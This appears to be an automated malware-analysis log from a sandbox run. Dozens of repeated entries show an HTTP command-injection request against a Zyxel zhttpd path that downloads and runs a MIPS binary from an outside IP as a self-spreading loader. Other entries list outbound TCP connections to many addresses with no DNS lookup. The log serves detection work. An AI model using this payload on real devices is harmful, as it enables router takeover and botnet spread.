            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: unknownTCP traffic detected without corresponding DNS query: 197.146.236.29
            Source: unknownTCP traffic detected without corresponding DNS query: 197.21.133.73
            Source: unknownTCP traffic detected without corresponding DNS query: 157.182.139.49
            Source: unknownTCP traffic detected without corresponding DNS query: 195.106.229.222
            Source: unknownTCP traffic detected without corresponding DNS query: 157.148.100.144
            Source: unknownTCP traffic detected without corresponding DNS query: 41.218.102.218
            Source: unknownTCP traffic detected without corresponding DNS query: 197.158.51.203
            Source: unknownTCP traffic detected without corresponding DNS query: 157.31.69.227
            Source: unknownTCP traffic detected without corresponding DNS query: 157.140.101.128
            Source: unknownTCP traffic detected without corresponding DNS query: 41.142.242.231
            Source: unknownTCP traffic detected without corresponding DNS query: 41.165.46.160
            Source: unknownTCP traffic detected without corresponding DNS query: 157.251.147.173
            Source: unknownTCP traffic detected without corresponding DNS query: 147.181.96.108
            Source: unknownTCP traffic detected without corresponding DNS query: 197.172.15.191
            Source: unknownTCP traffic detected without corresponding DNS query: 130.151.137.36
            Source: unknownTCP traffic detected without corresponding DNS query: 197.165.208.66
            Source: unknownTCP traffic detected without corresponding DNS query: 157.175.126.55
            Source: unknownTCP traffic detected without corresponding DNS query: 197.221.173.144
            Source: unknownTCP traffic detected without corresponding DNS query: 41.113.102.128
            Source: unknownTCP traffic detected without corresponding DNS query: 157.252.116.2
            Source: unknownTCP traffic detected without corresponding DNS query: 41.168.162.184
            Source: unknownTCP traffic detected without corresponding DNS query: 41.228.22.143
            Source: unknownTCP traffic detected without corresponding DNS query: 220.234.219.176
            Source: unknownTCP traffic detected without corresponding DNS query: 41.22.118.102
            Source: unknownTCP traffic detected without corresponding DNS query: 208.187.189.163
            Source: unknownTCP traffic detected without corresponding DNS query: 197.254.143.126
            Source: unknownTCP traffic detected without corresponding DNS query: 41.181.168.10
            Source: unknownTCP traffic detected without corresponding DNS query: 41.225.143.126
            Source: unknownTCP traffic detected without corresponding DNS query: 58.127.5.108
            Source: unknownTCP traffic detected without corresponding DNS query: 197.93.86.202
            Source: unknownTCP traffic detected without corresponding DNS query: 197.157.151.212
            Source: unknownTCP traffic detected without corresponding DNS query: 41.64.176.79
            Source: unknownTCP traffic detected without corresponding DNS query: 157.195.142.123
            Source: unknownTCP traffic detected without corresponding DNS query: 157.164.157.9
            Source: unknownTCP traffic detected without corresponding DNS query: 120.236.254.9
            Source: unknownTCP traffic detected without corresponding DNS query: 41.38.29.29
            Source: unknownTCP traffic detected without corresponding DNS query: 18.111.146.170
            Source: unknownTCP traffic detected without corresponding DNS query: 41.185.159.237
            Source: unknownTCP traffic detected without corresponding DNS query: 197.79.57.53
            Source: unknownTCP traffic detected without corresponding DNS query: 41.125.143.61
            Source: unknownTCP traffic detected without corresponding DNS query: 41.214.83.227
            Source: unknownTCP traffic detected without corresponding DNS query: 157.231.246.135
            Source: unknownTCP traffic detected without corresponding DNS query: 157.178.18.244
            Source: unknownTCP traffic detected without corresponding DNS query: 41.220.30.9
            Source: unknownTCP traffic detected without corresponding DNS query: 197.121.148.245
            Source: unknownTCP traffic detected without corresponding DNS query: 197.40.189.18
            Source: unknownTCP traffic detected without corresponding DNS query: 197.42.45.50
            Source: unknownTCP traffic detected without corresponding DNS query: 157.155.225.93
            Source: unknownTCP traffic detected without corresponding DNS query: 197.160.102.44
            Source: unknownTCP traffic detected without corresponding DNS query: 41.244.246.118
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
